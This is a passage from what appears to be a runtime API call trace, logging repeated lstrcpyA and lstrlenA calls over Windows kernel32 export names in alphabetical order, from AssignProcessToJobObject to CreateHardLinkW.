(lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.053] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.053] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.053] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.053] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.053] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.053] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.053] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.053] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.053] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.053] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.053] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.053] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.053] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.053] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.053] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.054] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.054] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.054] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.054] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.054] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.054] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.054] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.054] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.054] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.054] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.054] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.054] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.054] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.054] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.054] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.054] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.054] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.054] lstrlenA (lpString="BEEP") returned 4 [0184.054] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.054] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.055] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.055] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.055] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.055] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.055] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.055] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.055] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.055] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.055] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.055] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.055] lstrlenA (lpString="CANCELIO") returned 8 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.055] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.055] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.055] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.055] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.055] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.055] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.055] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.055] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.055] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.056] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.056] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.056] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.056] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.056] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.056] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.056] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.056] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.056] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.056] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.056] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.056] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.056] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.057] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.057] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.057] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.057] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.057] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.057] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.057] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.057] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.057] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.057] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.057] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.057] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.057] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.057] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.057] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.057] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.057] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.058] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.058] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.058] lstrlenA (lpString="COPYFILEA") returned 9 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.058] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.058] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.058] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.058] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.058] lstrlenA (lpString="COPYFILEW") returned 9 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.058] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.058] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.058] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.058] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.058] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.058] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.058] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.058] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.059] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.059] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.059] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.059] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.059] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.059] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.059] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.059] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.059] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.059] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.059] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.059] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.059] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.059] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.059] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.059] 